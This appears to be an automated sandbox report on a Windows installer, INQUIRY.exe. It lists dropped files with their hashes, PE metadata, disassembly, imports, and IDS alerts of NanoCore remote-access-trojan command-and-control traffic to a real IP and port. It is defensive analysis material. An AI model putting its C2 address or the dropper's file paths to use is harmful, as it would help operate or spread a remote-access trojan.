                        Preview:..8..'......".8.`.;Z.t.~.......R._..![...j9B..[f.E$<R&.(.=...P..*{m..-.]..G.#..'...D.)...~`..."...{.0...5U.L.L....?A.p.5.3tw....6...|VW.u$..\..7.....v..tTK..<?..cf..:..-..2..g.............j.].A....n.~..Ne-.#='..#......5fGeG..k...6.5~A.3.|Y.C+...&..YF..'..^..R..8...Z.t.........k.._.![...j9B.U.f.E.<R&.(...V..t..{....(].\Wbf.J....w.........s.......$.Dxy.G.0.K.Cp.5V3tw.~z...[.a..@.|.{..!.G[....$.s|...dRg-Q....._.......w..u).....2.\.8sw.=..E.L..g...y.v....f.u.....j....$Wv.(lS.....C+...&.j.pN.'......!.8.J.;Z.t........R....y./g.i$B.2zf.E.<R&.(.."......{2...(..|Wb..Z...w.....l.....s.Xc....$.9xy.G*0.6K...UO..tw.~z..#..Y0%@h..{.#........$.!|.=.[|JQ..J..j..{.w......u)......\k8sw.=..6....g...y.v....fTu.....j....$Wv.(lS.....C+...&..YF..'.....M.8.`.;Z.t........R._..![...j9B..[f.E$<R&.(.........{2...(..\Wbf.Jo...w........s.....$.9xy.G*0.6K.Cp.5.3tw.~z...[.Y.%@h|.{.#........$.s|...dRg-Q....._..{r...w..u).....2.\.8sw.=..6....g...y.v....fTu.....
                        Process:C:\Users\user\Desktop\INQUIRY.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):328199
                        Entropy (8bit):7.763501353201283
                        Encrypted:false
                        SSDEEP:6144:KU0YEMx0q3EXCouk+eWWP1QbXva183aCT0B/ER78PemFd/1OF2:QYxZ3Q8Heldu4IaCTm/HX5q2
                        MD5:6EB0F8E8E159CC6BE6F7C45CA7B714F2
                        SHA1:85A286A84D5344F29261BAC2622C98F61DC3BC6A
                        SHA-256:F85D1A62A230E16ACCF48069072C12F4EDD62350375FF21AF97257AC90CF8874
                        SHA-512:D6D0EA566DC37B961F2A16BF6BC892B261B92183C3BDB709F2B895E2BBA6E3E8DE1AD4A7D99767ECEA5890A364FA759DFD7E3C274F4B2080BBF9C3624A668544
                        Malicious:false
                        Reputation:low
                        Preview:.\......,...................F...lE.......[......m\..........................................................................................................................................................................................................................................J...............#...j...........................................................................................................................................$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\INQUIRY.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):18432
                        Entropy (8bit):5.728423253996569
                        Encrypted:false
                        SSDEEP:384:fWrH9a+lIcHqWIHcJALBQNdZCvSdQkU7kO0Kkqb:0nlIfWILoLUSdQHkJKT
                        MD5:964F57C518C022C62A555DEB4E48D02E
                        SHA1:B71006B1850415DDF27B656A18382963EDBD4C9D
                        SHA-256:DAAEED4ABBDCB59F82CB65AC2C32929E52E821E9068A2B453ABD3118DF1E9378
                        SHA-512:296D4B41119F294E4D86B7CA5EE395C05F3AD9520B98391DACD34AECCCB733092DB7134CBA935863D5E45235C593171B71D8507292AD44E6B9FE8BD6BF5C20C0
                        Malicious:false
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0...0..Ln...0..Ln...0..In...0..Ln...0..Rich.0..........................PE..L......a...........!.....8...................P............................................@..........................P..H...8Q.......`.......................p..p....................................................P...............................text....6.......8.................. ..`.rdata..&....P.......<..............@..@.rsrc........`.......D..............@..@.reloc..p....p.......F..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):328199
                        Entropy (8bit):7.763501353201283
                        Encrypted:false
                        SSDEEP:6144:KU0YEMx0q3EXCouk+eWWP1QbXva183aCT0B/ER78PemFd/1OF2:QYxZ3Q8Heldu4IaCTm/HX5q2
                        MD5:6EB0F8E8E159CC6BE6F7C45CA7B714F2
                        SHA1:85A286A84D5344F29261BAC2622C98F61DC3BC6A
                        SHA-256:F85D1A62A230E16ACCF48069072C12F4EDD62350375FF21AF97257AC90CF8874
                        SHA-512:D6D0EA566DC37B961F2A16BF6BC892B261B92183C3BDB709F2B895E2BBA6E3E8DE1AD4A7D99767ECEA5890A364FA759DFD7E3C274F4B2080BBF9C3624A668544
                        Malicious:false
                        Reputation:low
                        Preview:.\......,...................F...lE.......[......m\..........................................................................................................................................................................................................................................J...............#...j...........................................................................................................................................$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):18432
                        Entropy (8bit):5.728423253996569
                        Encrypted:false
                        SSDEEP:384:fWrH9a+lIcHqWIHcJALBQNdZCvSdQkU7kO0Kkqb:0nlIfWILoLUSdQHkJKT
                        MD5:964F57C518C022C62A555DEB4E48D02E
                        SHA1:B71006B1850415DDF27B656A18382963EDBD4C9D
                        SHA-256:DAAEED4ABBDCB59F82CB65AC2C32929E52E821E9068A2B453ABD3118DF1E9378
                        SHA-512:296D4B41119F294E4D86B7CA5EE395C05F3AD9520B98391DACD34AECCCB733092DB7134CBA935863D5E45235C593171B71D8507292AD44E6B9FE8BD6BF5C20C0
                        Malicious:false
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0...0..Ln...0..Ln...0..In...0..Ln...0..Rich.0..........................PE..L......a...........!.....8...................P............................................@..........................P..H...8Q.......`.......................p..p....................................................P...............................text....6.......8.................. ..`.rdata..&....P.......<..............@..@.rsrc........`.......D..............@..@.reloc..p....p.......F..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):328199
                        Entropy (8bit):7.763501353201283
                        Encrypted:false
                        SSDEEP:6144:KU0YEMx0q3EXCouk+eWWP1QbXva183aCT0B/ER78PemFd/1OF2:QYxZ3Q8Heldu4IaCTm/HX5q2
                        MD5:6EB0F8E8E159CC6BE6F7C45CA7B714F2
                        SHA1:85A286A84D5344F29261BAC2622C98F61DC3BC6A
                        SHA-256:F85D1A62A230E16ACCF48069072C12F4EDD62350375FF21AF97257AC90CF8874
                        SHA-512:D6D0EA566DC37B961F2A16BF6BC892B261B92183C3BDB709F2B895E2BBA6E3E8DE1AD4A7D99767ECEA5890A364FA759DFD7E3C274F4B2080BBF9C3624A668544
                        Malicious:false
                        Reputation:low
                        Preview:.\......,...................F...lE.......[......m\..........................................................................................................................................................................................................................................J...............#...j...........................................................................................................................................$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):18432
                        Entropy (8bit):5.728423253996569
                        Encrypted:false
                        SSDEEP:384:fWrH9a+lIcHqWIHcJALBQNdZCvSdQkU7kO0Kkqb:0nlIfWILoLUSdQHkJKT
                        MD5:964F57C518C022C62A555DEB4E48D02E
                        SHA1:B71006B1850415DDF27B656A18382963EDBD4C9D
                        SHA-256:DAAEED4ABBDCB59F82CB65AC2C32929E52E821E9068A2B453ABD3118DF1E9378
                        SHA-512:296D4B41119F294E4D86B7CA5EE395C05F3AD9520B98391DACD34AECCCB733092DB7134CBA935863D5E45235C593171B71D8507292AD44E6B9FE8BD6BF5C20C0
                        Malicious:false
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0...0..Ln...0..Ln...0..In...0..Ln...0..Rich.0..........................PE..L......a...........!.....8...................P............................................@..........................P..H...8Q.......`.......................p..p....................................................P...............................text....6.......8.................. ..`.rdata..&....P.......<..............@..@.rsrc........`.......D..............@..@.reloc..p....p.......F..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\INQUIRY.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):7539
                        Entropy (8bit):6.073593928396658
                        Encrypted:false
                        SSDEEP:192:dCBXlCcDOOqcG8KiqmpLiu90E6lJu96utIdlxaP:4trDOOqcGce807u0u2fxy
                        MD5:7AA8D1B3501B957F963AD8B0E873510C
                        SHA1:8DF70D69A3B89166FAF60D2E8BB0F2BADBA9CB10
                        SHA-256:350C38CCDE959E201754E7469F8149A7548A789160B202CF6397AAF439987638
                        SHA-512:0926C416DA709AE8ECB6C79A300BB2692A80541C183859C959F292B4E9201DB8937CD2E5D757318FD60311B1F1D77C3B0C93E5330BC82A5A89D0F477BE7E6874
                        Malicious:false
                        Reputation:low
                        Preview:..qtt............tI.4.IE..I.4.IE.....t1..Lttt...t9_h9_D....ttt.....9_h9_D....ttt.....9_h9_D....ttt.,..(9_h9_D....ttt.4..0.WDpb..l|.4uu.h.......D..p%+.........p3%..D{....u...p6........%.tttt.pPo-M..9_.{9_.~9_,.|9_4.{9_.Y9_.z..`D...h...T..s_.9_..~.lIo..u...tttt1.PpUttt.pPg-..zY..Yz}..w6ht.....I.4.IE...l.t..heT.l.t.D.@3....3p...l.t..l.s.......w6ht.B.2..\vtt..vtt6@t..9...vtt.xvtt6lt.gx....vtt..vtt6lt.....LI.4.IE..1..Dttt.....W.t`B..2tt...........@ott.4`..l..l{.+t.g..g.....l{3.t.g..g..v.l|.4t.o....9...stt..*.99...I...9_l..999...W.t`r...t.q1..sttt....w6pt......I.4.IE..1..Lttt.4...W.t`B..2tt............ptt.4I..ttt.l..l{.+t.g4.g0.h..l{3.t.g4.g0.D..l{...g4.g0.@%+.l~..u.?4.?0....l{3.v.g4.g0.o.l|.4t.o4..B.2...ttt....99...W<t`l...<.s.A9_<9_@9_D9_h9_l.!.99...W.t`r...t.q1..sttt....w6@t.....81..Dttt.....W.t`B..2tt............utt.4`..l..l{.+t.g..g..h..l{3.t.g..g..v.l|.4t.o...gx...Qttt..P.99...j9_
                        Process:C:\Users\user\Desktop\INQUIRY.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):232
                        Entropy (8bit):7.089541637477408
                        Encrypted:false
                        SSDEEP:3:XrURGizD7cnRNGbgCFKRNX/pBK0jCV83ne+VdWPiKgmR7kkmefoeLBizbCuVkqYM:X4LDAnybgCFcps0OafmCYDlizZr/i/Oh
                        MD5:9E7D0351E4DF94A9B0BADCEB6A9DB963
                        SHA1:76C6A69B1C31CEA2014D1FD1E222A3DD1E433005
                        SHA-256:AAFC7B40C5FE680A2BB549C3B90AABAAC63163F74FFFC0B00277C6BBFF88B757
                        SHA-512:93CCF7E046A3C403ECF8BC4F1A8850BA0180FE18926C98B297C5214EB77BC212C8FBCC58412D0307840CF2715B63BE68BACDA95AA98E82835C5C53F17EF38511
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&
                        Process:C:\Users\user\Desktop\INQUIRY.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8
                        Entropy (8bit):3.0
                        Encrypted:false
                        SSDEEP:3:3e8t:B
                        MD5:CF0C25BF3DC4FFBB8F3E0CDC145DD33E
                        SHA1:6ED58B87F71DA1F789EB1A81A6FB08C314FB508A
                        SHA-256:34B778FCE744D50ADF7F57F7CA5480538294B496E425C141ED07EBC5A17CB81F
                        SHA-512:D22752D21943BD8DBF30B48066B1F8DCDB139467D4352A7E114DBBBE4EB082F8A3566F0865DE93B138FDAC5FEE83D673C32D727B864419572C382EFBA8D960F8
                        Malicious:true
                        Preview:k=.>...H
                        Process:C:\Users\user\Desktop\INQUIRY.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Category:dropped
                        Size (bytes):315125
                        Entropy (8bit):7.883283847039061
                        Encrypted:false
                        SSDEEP:6144:/w8yH0o3Hx8NFIImn7/q7cly7x5rYFggsIKW4BSusOM0odo5BehhFl7/:W0vII073lMhYOsKPBSusOWo5Al7/
                        MD5:DC0ACC75361BB39FBD4ABEC6EDC82CD5
                        SHA1:9E9C823725BEE12D0980009C04692AD9089D9308
                        SHA-256:D73CBCB2D300D84618D476706765B185C12D20D2E52AFE120FB587C81BE7CC80
                        SHA-512:F40CB60C1D80B09322783BFC83C34784CD28F9B6462701AA069C867986DF99DB06CB088203B02D6F6CA8CCB95FF60AE856D8B92FC2D40BC64E1134EB950CC996
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................................................................s..........HA...........................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc...HA.......B...t..............@..@........................................................................................................................................................................................................................................................................................................................................................
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.883283847039061
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 92.16%
                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:INQUIRY.exe
                        File size:315125
                        MD5:dc0acc75361bb39fbd4abec6edc82cd5
                        SHA1:9e9c823725bee12d0980009c04692ad9089d9308
                        SHA256:d73cbcb2d300d84618d476706765b185c12d20d2e52afe120fb587c81be7cc80
                        SHA512:f40cb60c1d80b09322783bfc83c34784cd28f9b6462701aa069c867986df99db06cb088203b02d6f6ca8ccb95ff60ae856d8b92fc2d40bc64e1134eb950cc996
                        SSDEEP:6144:/w8yH0o3Hx8NFIImn7/q7cly7x5rYFggsIKW4BSusOM0odo5BehhFl7/:W0vII073lMhYOsKPBSusOWo5Al7/
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....
                        Icon Hash:0c129232d9ccc41b
                        Entrypoint:0x403225
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        DLL Characteristics:
                        Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:099c0646ea7282d232219f8807883be0
                        Instruction
                        sub esp, 00000180h
                        push ebx
                        push ebp
                        push esi
                        xor ebx, ebx
                        push edi
                        mov dword ptr [esp+18h], ebx
                        mov dword ptr [esp+10h], 00409128h
                        xor esi, esi
                        mov byte ptr [esp+14h], 00000020h
                        call dword ptr [00407030h]
                        push 00008001h
                        call dword ptr [004070B4h]
                        push ebx
                        call dword ptr [0040727Ch]
                        push 00000008h
                        mov dword ptr [00423F58h], eax
                        call 00007F9F28CAD860h
                        mov dword ptr [00423EA4h], eax
                        push ebx
                        lea eax, dword ptr [esp+34h]
                        push 00000160h
                        push eax
                        push ebx
                        push 0041F450h
                        call dword ptr [00407158h]
                        push 004091B0h
                        push 004236A0h
                        call 00007F9F28CAD517h
                        call dword ptr [004070B0h]
                        mov edi, 00429000h
                        push eax
                        push edi
                        call 00007F9F28CAD505h
                        push ebx
                        call dword ptr [0040710Ch]
                        cmp byte ptr [00429000h], 00000022h
                        mov dword ptr [00423EA0h], eax
                        mov eax, edi
                        jne 00007F9F28CAAD2Ch
                        mov byte ptr [esp+14h], 00000022h
                        mov eax, 00429001h
                        push dword ptr [esp+14h]
                        push eax
                        call 00007F9F28CACFF8h
                        push eax
                        call dword ptr [0040721Ch]
                        mov dword ptr [esp+1Ch], eax
                        jmp 00007F9F28CAAD85h
                        cmp cl, 00000020h
                        jne 00007F9F28CAAD28h
                        inc eax
                        cmp byte ptr [eax], 00000020h
                        je 00007F9F28CAAD1Ch
                        cmp byte ptr [eax], 00000022h
                        mov byte ptr [eax+eax+00h], 00000000h
                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x4148.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .rsrc0x2c0000x41480x4200False0.209753787879data3.76510054969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x2c1f00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4289923840, next used block 4289923840EnglishUnited States
                        RT_ICON0x2e7980x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4289923840, next used block 4289923840EnglishUnited States
                        RT_ICON0x2f8400x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_DIALOG0x2fca80x100dataEnglishUnited States
                        RT_DIALOG0x2fda80x11cdataEnglishUnited States
                        RT_DIALOG0x2fec80x60dataEnglishUnited States
                        RT_GROUP_ICON0x2ff280x30dataEnglishUnited States
                        RT_MANIFEST0x2ff580x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                        DLLImport
                        KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                        USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                        SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                        ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                        VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        01/24/22-02:24:20.152195UDP254DNS SPOOF query response with TTL of 1 min. and no authority53591238.8.8.8192.168.2.4
                        01/24/22-02:24:20.743770TCP2025019ET TROJAN Possible NanoCore C2 60B497354141192.168.2.4185.140.53.6
                        01/24/22-02:24:26.623926UDP254DNS SPOOF query response with TTL of 1 min. and no authority53545318.8.8.8192.168.2.4
                        01/24/22-02:24:26.701611TCP2025019ET TROJAN Possible NanoCore C2 60B497424141192.168.2.4185.140.53.6
                        01/24/22-02:24:31.333067TCP2025019ET TROJAN Possible NanoCore C2 60B497434141192.168.2.4185.140.53.6
                        01/24/22-02:24:37.493200TCP2025019ET TROJAN Possible NanoCore C2 60B497504141192.168.2.4185.140.53.6
                        01/24/22-02:24:43.325751UDP254DNS SPOOF query response with TTL of 1 min. and no authority53530978.8.8.8192.168.2.4
                        01/24/22-02:24:43.429089TCP2025019ET TROJAN Possible NanoCore C2 60B497574141192.168.2.4185.140.53.6
                        01/24/22-02:24:50.367349UDP254DNS SPOOF query response with TTL of 1 min. and no authority53623898.8.8.8192.168.2.4
                        01/24/22-02:24:50.487020TCP2025019ET TROJAN Possible NanoCore C2 60B497604141192.168.2.4185.140.53.6
                        01/24/22-02:24:56.459195TCP2025019ET TROJAN Possible NanoCore C2 60B497674141192.168.2.4185.140.53.6
                        01/24/22-02:25:02.430704UDP254DNS SPOOF query response with TTL of 1 min. and no authority53558548.8.8.8192.168.2.4
                        01/24/22-02:25:02.524995TCP2025019ET TROJAN Possible NanoCore C2 60B497744141192.168.2.4185.140.53.6
                        01/24/22-02:25:08.907834UDP254DNS SPOOF query response with TTL of 1 min. and no authority53645498.8.8.8192.168.2.4
                        01/24/22-02:25:08.993738TCP2025019ET TROJAN Possible NanoCore C2 60B497774141192.168.2.4185.140.53.6
                        01/24/22-02:25:14.871570UDP254DNS SPOOF query response with TTL of 1 min. and no authority53631538.8.8.8192.168.2.4
                        01/24/22-02:25:14.965823TCP2025019ET TROJAN Possible NanoCore C2 60B497784141192.168.2.4185.140.53.6
                        01/24/22-02:25:21.071315TCP2025019ET TROJAN Possible NanoCore C2 60B497794141192.168.2.4185.140.53.6
                        01/24/22-02:25:27.268831TCP2025019ET TROJAN Possible NanoCore C2 60B497824141192.168.2.4185.140.53.6
                        01/24/22-02:25:33.435841UDP254DNS SPOOF query response with TTL of 1 min. and no authority53565348.8.8.8192.168.2.4
                        01/24/22-02:25:33.543043TCP2025019ET TROJAN Possible NanoCore C2 60B497884141192.168.2.4185.140.53.6
                        01/24/22-02:25:39.718199TCP2025019ET TROJAN Possible NanoCore C2 60B497894141192.168.2.4185.140.53.6
                        01/24/22-02:25:45.786163TCP2025019ET TROJAN Possible NanoCore C2 60B497914141192.168.2.4185.140.53.6
                        01/24/22-02:25:51.826837TCP2025019ET TROJAN Possible NanoCore C2 60B497924141192.168.2.4185.140.53.6
                        01/24/22-02:25:58.115693TCP2025019ET TROJAN Possible NanoCore C2 60B498104141192.168.2.4185.140.53.6
                        01/24/22-02:26:04.066618UDP254DNS SPOOF query response with TTL of 1 min. and no authority53506018.8.8.8192.168.2.4
                        01/24/22-02:26:04.236531TCP2025019ET TROJAN Possible NanoCore C2 60B498274141192.168.2.4185.140.53.6
                        01/24/22-02:26:10.220319UDP254DNS SPOOF query response with TTL of 1 min. and no authority53608758.8.8.8192.168.2.4
                        01/24/22-02:26:10.485870TCP2025019ET TROJAN Possible NanoCore C2 60B498314141192.168.2.4185.140.53.6
                        01/24/22-02:26:16.639258UDP254DNS SPOOF query response with TTL of 1 min. and no authority53564488.8.8.8192.168.2.4
                        01/24/22-02:26:16.719867TCP2025019ET TROJAN Possible NanoCore C2 60B498334141192.168.2.4185.140.53.6
                        TimestampSource PortDest PortSource IPDest IP
                        Jan 24, 2022 02:24:20.164705038 CET497354141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:20.700340986 CET414149735185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:20.700464010 CET497354141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:20.743769884 CET497354141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:21.016308069 CET414149735185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:21.016460896 CET497354141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:21.349014997 CET414149735185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:21.349283934 CET497354141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:21.448935986 CET414149735185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:21.467855930 CET497354141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:21.753155947 CET414149735185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:21.753386974 CET497354141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:22.075184107 CET414149735185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:22.075364113 CET497354141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:22.369034052 CET414149735185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:22.369168997 CET497354141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:22.544080019 CET497354141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:22.647011995 CET414149735185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:22.647120953 CET497354141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:26.625017881 CET497424141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:26.700880051 CET414149742185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:26.701059103 CET497424141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:26.701611042 CET497424141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:26.815442085 CET414149742185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:31.237526894 CET497434141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:31.332380056 CET414149743185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:31.332499981 CET497434141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:31.333066940 CET497434141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:31.577058077 CET414149743185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:31.577172995 CET497434141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:31.879667997 CET414149743185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:31.879786015 CET497434141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:32.297938108 CET497434141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:32.381290913 CET414149743185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:32.886949062 CET497434141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:32.983927965 CET414149743185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:32.990437984 CET414149743185.140.53.6192.168.2.4
                        Jan 24, 2022 02:24:33.045161009 CET497434141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:24:33.198896885 CET497434141192.168.2.4185.140.53.6
